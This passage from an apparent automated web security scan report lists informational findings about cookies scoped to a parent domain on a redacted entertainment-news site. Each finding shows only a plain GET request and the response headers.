Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Mon, 28-Feb-2011 23:26:34 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB21
Date: Sat, 29 Jan 2011 23:26:34 GMT
Content-Length: 62798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head
...[SNIP]...

16.192. http://specials.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=85e00d6e6f6c4a778e4031e134497c88; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=63CE5261B6254DBF87870C0B65E15402; domain=.redacted; expires=Thu, 18-Aug-2011 01:50:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:50:58 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=85e00d6e6f6c4a778e4031e134497c88; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=63CE5261B6254DBF87870C0B65E15402; domain=.redacted; expires=Thu, 18-Aug-2011 01:50:58 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 24408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.193. http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=47b7e33a132247bf8382137776d91eb8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=6378AE381CF74C0AB0F61F11DCCB43D6; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=47b7e33a132247bf8382137776d91eb8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=6378AE381CF74C0AB0F61F11DCCB43D6; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:21 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.194. http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=a0e82ca105e74736bef180d33ad85b63; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=3D7690447A274FA6A7A5188FFB75CF63; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a0e82ca105e74736bef180d33ad85b63; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=3D7690447A274FA6A7A5188FFB75CF63; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:19 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.195. http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Famous-February-birthdays.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=af42dcb823fb4382b27164e71b4553fa; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=14EF63B027F946CD907C6E5D6601CA44; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:26 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Famous-February-birthdays.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=af42dcb823fb4382b27164e71b4553fa; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=14EF63B027F946CD907C6E5D6601CA44; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:26 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.196. http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Jesse-James-ex-arrested.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=d363cc0566a641bbac227c396c72e6da; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=B5C6E6CBBD8140B1A45E68CFF623563E; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Jesse-James-ex-arrested.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:22 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=d363cc0566a641bbac227c396c72e6da; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=B5C6E6CBBD8140B1A45E68CFF623563E; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:22 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.197. http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/PETAs-newest-naked-celeb.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=ce8cf853b593429c8c5ae3125646c35b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=14CA8A1489AA49D39C1600720CAD343B; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:15 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/PETAs-newest-naked-celeb.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:15 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ce8cf853b593429c8c5ae3125646c35b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=14CA8A1489AA49D39C1600720CAD343B; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:15 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.198. http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Unlikely-celebrity-friendships.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=b8024ffbe31247238960e8dad42e6ae0; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=54B802C72C5D4A968AE6BEB7BEB43885; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Unlikely-celebrity-friendships.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=b8024ffbe31247238960e8dad42e6ae0; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=54B802C72C5D4A968AE6BEB7BEB43885; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:25 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.199. http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Billionaires-caucus.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=509e6c71b5ba480d910bf7b7e5f60afe; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=0BDAD1C110174CA4BA5911AED9744835; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Billionaires-caucus.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.200. http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=115826fb361947fba7a59745eee1a2fe; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=19D7523F04DB408783F64E4246E74057; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:59 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=115826fb361947fba7a59745eee1a2fe; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=19D7523F04DB408783F64E4246E74057; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:59 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.201. http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=686b26f612ef4ff886afcdf5b0daf95d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=64FF62872D864AAC8B7EAB35C97F487F; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:10 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=686b26f612ef4ff886afcdf5b0daf95d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=64FF62872D864AAC8B7EAB35C97F487F; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:10 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.202. http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Egypt-new-vp.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=075506e27db2457ab39ca3349aad58aa; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=751919D3B46045639E5A7F4BB4D9E241; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Egypt-new-vp.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:58 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=075506e27db2457ab39ca3349aad58aa; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=751919D3B46045639E5A7F4BB4D9E241; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:58 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.203. http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Famous-escapes.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=1609e5a58c494ff581dac6b56594c457; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=5969A2C4E44346D5AD9CAFB1687B8DC5; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:57 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Famous-escapes.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:57 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1609e5a58c494ff581dac6b56594c457; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5969A2C4E44346D5AD9CAFB1687B8DC5; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:57 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.204. http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Mom-kills-teens.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=adae2bda89bb456997895c86d0995bea; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=606B6FED01FA4B74AC05FBCA266D2456; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:12 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Mom-kills-teens.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:12 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=adae2bda89bb456997895c86d0995bea; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=606B6FED01FA4B74AC05FBCA266D2456; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:12 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.205. http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Nathan-Woods-dies.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=43c0ed9dcd59405e97e0ca56ecbc5934; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=E67F9D21403E45ABB6A08727A2CBE039; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:07 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Nathan-Woods-dies.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:07 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=43c0ed9dcd59405e97e0ca56ecbc5934; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E67F9D21403E45ABB6A08727A2CBE039; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:07 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.206. http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=44c6713e16484bef8864fe79a72511ae; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=FCB994723662439EA7B8A5803A9422E2; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx?cp-documentid=27453665 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.207. http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Taco-Bell-fights-back.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=603578c5dd754321a5d5f718e6e3719e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=0F1C39FCE6A54EAF8026C0BE98EE9363; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:02 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Taco-Bell-fights-back.aspx?cp-documentid=27449852 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.208. http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=3dac27f13e6f43ddbdd099e1136b2ed6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=C971D4F5C5424720A741D6E2B244FC0D; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:13 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:14 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3dac27f13e6f43ddbdd099e1136b2ed6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=C971D4F5C5424720A741D6E2B244FC0D; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:13 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.209. http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
